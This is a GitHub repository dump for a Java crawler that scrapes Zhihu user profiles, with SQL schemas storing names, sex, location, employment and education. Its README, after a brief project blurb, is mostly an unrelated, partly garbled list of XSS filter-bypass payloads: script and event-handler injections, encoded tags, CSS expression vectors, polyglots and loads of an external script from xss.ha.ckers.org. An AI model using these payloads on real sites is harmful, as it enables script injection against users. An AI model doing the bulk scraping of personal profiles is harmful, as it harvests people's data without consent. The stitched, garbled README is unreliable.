├── .gitignore ├── README.md ├── ZhihuSpriderGitHub.rar ├── userurl.sql └── zhihuuser.sql /.gitignore: -------------------------------------------------------------------------------- 1 | # Compiled Object files, Static and Dynamic libs (Shared Objects) 2 | *.o 3 | *.a 4 | *.so 5 | 6 | # Folders 7 | _obj 8 | _test 9 | 10 | # Architecture specific extensions/prefixes 11 | *.[568vq] 12 | [568vq].out 13 | 14 | *.cgo1.go 15 | *.cgo2.c 16 | _cgo_defun.c 17 | _cgo_gotypes.go 18 | _cgo_export.* 19 | 20 | _testmain.go 21 | 22 | *.exe 23 | *.test 24 | *.prof 25 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # JavaZhiHuSpider 2 | ### java知乎爬虫:爬取用户信息 已爬10w(理论能爬完所有关注了任意话题的用户信息) 3 | ### 没有使用框架,httpclient连接池+线程池+正则实现. 4 | 5 | ### 厚颜无耻的挂上博客[HacL](http://yhis.me)+求波星 :) 6 | 7 | 8 | ´úÂë¹ýÂË£º 9 | medium--> Ë«Ð´ÈÆ¹ý£ºript>alert(/xss/) 10 | ´óСд»ìÏýÈÆ¹ý£º 11 | high-->ͨ¹ýimg¡¢bodyµÈ±êÇ©µÄʼþ»òÕßiframeµÈ±êÇ©µÄsrc×¢Èë¶ñÒâµÄjs´úÂë: 12 | 13 | prompt(¡®qq¡¯) 14 | onmouseover=¡¯alert(xss)¡¯ 15 | onmouseover=¡¯prompt(qq)¡¯ 16 | 17 | >"'> 18 | >"'> 19 | 20 | 21 | "+alert('XSS')+" 22 | '> 23 | ='> 24 | 25 | 26 | alert('XSS') 27 | 28 | %0a%0a.jsp 29 | %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e 30 | %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e 31 | %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html 32 | 33 | a.jsp/ 34 | "> 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | "";'>out 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | alert('XSS'); 64 | .XSS{background-image:url("javascript.:alert('XSS')");} 65 | BODY{background:url("javascript.:alert('XSS')")} 66 | 67 | getURL("javascript.:alert('XSS')") 68 | a="get";b="URL";c="javascript.:";d="alert('XSS');";eval(a+b+c+d); 69 | 70 | "> <" 71 | 72 | 74 | "SRC="http://xss.ha.ckers.org/a.js"> 75 | 76 | '"SRC="http://xss.ha.ckers.org/a.js"> 77 | PTSRC="http://xss.ha.ckers.org/a.js"> 78 | link 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | '`"><\x3Cscript>javascript:alert(8) 87 | '`"><\x00script>javascript:alert(9) 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | \x3Cscript>javascript:alert(75) 154 | '"`> 155 | javascript:alert(78)javascript:alert(79)javascript:alert(80) 159 | 160 | --> --> 161 | --> 162 | --> 163 | --> 164 | `"'> 167 | test 168 | test 169 | test 170 | test 171 | test 172 | test 173 | test 174 | test 175 | test 176 | test 177 | test 178 | test 179 | test 180 | test 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | "'`>ABCDEF 189 | "'`>ABCDEF 190 | 191 | 192 | 193 | '`"><\x3Cscript>javascript:alert(115) 194 | '`"><\x00script>javascript:alert(116) 195 | "'`><\x3Cimg src=xxx:x onerror=javascript:alert(117)> 196 | "'`><\x00img src=xxx:x onerror=javascript:alert(118)> 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | ABCDEF 209 | ABCDEF 210 | ABCDEF 211 | ABCDEF 212 | ABCDEF 213 | ABCDEF 214 | ABCDEF 215 | ABCDEF 216 | ABCDEF 217 | ABCDEF 218 | ABCDEF 219 | ABCDEF 220 | ABCDEF 221 | ABCDEF 222 | ABCDEF 223 | ABCDEF 224 | ABCDEF 225 | ABCDEF 226 | ABCDEF 227 | ABCDEF 228 | ABCDEF 229 | ABCDEF 230 | ABCDEF 231 | ABCDEF 232 | ABCDEF 233 | ABCDEF 234 | ABCDEF 235 | test 236 | test 237 | test 238 | test 239 | test 240 | test 241 | test 242 | test 243 | test 244 | test 245 | test 246 | test 247 | test 248 | test 249 | test 250 | test 251 | test 252 | test 253 | test 254 | test 255 | test 256 | test 257 | test 258 | test 259 | test 260 | test 261 | test 262 | test 263 | test 264 | test 265 | test 266 | test 267 | test 268 | test 269 | test 270 | test 271 | test 272 | test 273 | test 274 | test 275 | test 276 | test 277 | test 278 | test 279 | test 280 | test 281 | test 282 | test 283 | test 284 | test 285 | test 286 | test 287 | test 288 | test 289 | test 290 | test 291 | test 292 | `"'> 293 | `"'> 294 | `"'> 295 | `"'> 296 | `"'> 297 | `"'> 298 | `"'> 299 | `"'> 300 | `"'> 301 | `"'> 302 | "`'> 303 | "`'> 304 | "`'> 305 | "`'> 306 | "`'> 307 | "`'> 308 | "`'> 309 | "`'> 310 | "`'> 311 | "`'> 312 | "`'> 313 | "`'> 314 | "`'> 315 | "`'> 316 | "`'> 317 | "`'> 318 | "`'> 319 | "`'> 320 | "`'> 321 | "`'> 322 | "`'> 323 | "`'> 324 | "`'> 325 | "`'> 326 | "`'> 327 | "`'> 328 | "`'> 329 | "`'> 330 | "`'> 331 | "`'> 332 | "`'> 333 | "`'> 334 | "`'> 335 | "`'> 336 | "`'> 337 | "`'> 338 | "`'> 339 | "/> 340 | "/> 341 | "/> 342 | "/> 343 | "/> 344 | "/> 345 | "/> 346 | "/> 347 | "/> 348 | 349 | 350 | 351 | 352 | 353 | 354 | 355 | `"'> 356 | `"'> 357 | `"'> 358 | `"'> 359 | `"'> 360 | `"'> 361 | `"'> 362 | 383 | 384 | alert(308)0 385 | 386 | 387 | 388 | 389 | 390 | "> 393 | "> 394 | foo=">"> 395 | foo=">"> 396 | 397 | <% foo> 398 | 399 | 400 | 401 | 402 | 403 | 404 | 405 | 406 | 407 | 408 | 409 | 410 | 411 | 412 | 413 | 414 | 415 | 416 | 417 | 418 | 419 | 420 | 421 | 422 | 423 | 424 | 425 | 426 | 427 | 428 | 429 | 430 | 431 | 432 | 433 | XXX 434 | 435 | 436 | 437 | 438 | 439 | 440 | 441 | X 442 | 443 | @import "data:,*%7bx:expression(javascript:alert(370))%7D"; 445 | XXXXXX 446 | / style=x:expression\28javascript:alert(375)\29> 447 | 448 | X 449 | 450 | 451 | 452 | 453 | ¼script¾javascript:alert(390)¼/script¾ 454 | X 455 | 392 456 | 393 457 | 395 458 | XXX 459 | 460 | 461 | x 462 | 463 | 464 | 465 | 466 | 467 | 468 | 469 | 470 | 471 | 473 | 474 | 475 | 476 | 477 | 478 | XSS 479 | 480 | 481 | 482 | 483 | 484 | 485 | 486 | 487 | 488 | 489 | 490 | 491 | 492 | 493 | 494 | XSS""","XML namespace."),("""<IMG SRC="javascript:javascript:alert(446)"> 495 | 496 | X 497 | 498 | 499 | 500 | && 502 | 503 | javascript:alert(458); 504 | 505 | 506 | 507 | ]] 508 | 509 | test467 510 | test468 511 | 512 | ';alert(471))//';alert(471))//"; 513 | alert(472))//";alert(472))//-- 514 | >">'> 515 | 516 | 517 | 518 | 519 | 520 | xxs link 521 | xxs link 522 | "> 523 | 524 | 525 | 526 | 527 | 528 | 529 | 530 | 531 | perl -e 'print "";' > out 532 | 533 | 534 | < 535 | 538 | 539 | 540 | 541 | 542 | XSS 543 | 544 | 545 | 546 | 547 | 548 | 549 | exp/* 550 | 551 | 552 | 553 | 554 | 555 | ¼script¾alert(531)¼/script¾ 556 | 557 | 558 | 559 | 560 | 561 | 562 | 563 | 564 | 565 | 566 | 567 | echo('alert(549)'); ?> 568 | 569 | +ADw-SCRIPT+AD4-alert(553);+ADw-/SCRIPT+AD4- 570 | /*%00*/alert(577)/*%00*/"> 573 | 574 | 575 | http://www.googlealert(594)) 579 | X 580 | 581 | 583 | 584 | X 587 | http://www. 592 | 593 | style="x:"> 598 | <--` --!> 599 | x 600 | CLICKME 601 | ‘; alert(667); 602 | ‘)alert(668);// 603 | 604 | 605 | 606 | 607 | 608 | 609 | /*%00*/alert(685)/*%00*/"> 612 | 613 | 614 | http://www.googlealert(702)) 618 | X 619 | 620 | 622 | 623 | X 626 | http://www. 631 | 632 | style="x:"> 637 | <--` --!> 638 | x 639 | CLICKME 640 | ‘;alert(775))//’;alert(775))//”;alert(775))//”;alert(775))//–>”>’> 641 | ”> 642 | 643 | 644 | 645 | < 646 | %253cscript%253ealert(781)%253c/script%253e 647 | “>alert(782) 648 | foo 649 | ipt>alert(784)ipt> 650 | 651 | 652 | 653 | 656 | 657 | <"';alert(796))//\';alert(796))//";alert(796))//\";alert(796))//-->">'> 658 | 659 | < 660 | <"';alert(806))//\';alert(806))//";alert(806))//\";alert(806))//-->">'> 661 | ';alert(807))//\';alert(807))//";alert(807))//\";alert(807))//-->">'>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 663 | -------------------------------------------------------------------------------- /ZhihuSpriderGitHub.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yhisme/JavaZhiHuSpider/c0d8503caf6bef33a1cc0718225a744783afc097/ZhihuSpriderGitHub.rar -------------------------------------------------------------------------------- /userurl.sql: -------------------------------------------------------------------------------- 1 | 2 | CREATE TABLE `userurl` ( 3 | `url` varchar(20) NOT NULL, 4 | PRIMARY KEY (`url`) 5 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4; 6 | -------------------------------------------------------------------------------- /zhihuuser.sql: -------------------------------------------------------------------------------- 1 | CREATE TABLE `zhihuuser` ( 2 | `name` varchar(30) DEFAULT NULL, 3 | `sex` varchar(5) DEFAULT NULL, 4 | `location` varchar(30) DEFAULT NULL, 5 | `bussiness` varchar(30) DEFAULT NULL, 6 | `employment` varchar(30) DEFAULT NULL, 7 | `postion` varchar(30) DEFAULT NULL, 8 | `education` varchar(30) DEFAULT NULL, 9 | `education_extra` varchar(30) DEFAULT NULL, 10 | `suppose` int(11) DEFAULT NULL, 11 | `thanks` int(11) DEFAULT NULL, 12 | `question` int(11) DEFAULT NULL, 13 | `answer` int(11) DEFAULT NULL, 14 | `article` int(11) DEFAULT NULL, 15 | `followers` int(11) DEFAULT NULL, 16 | `following` int(11) DEFAULT NULL, 17 | `bewatched` int(11) DEFAULT NULL 18 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4; 19 | --------------------------------------------------------------------------------
499 | 500 | && 502 | 503 | javascript:alert(458); 504 | 505 |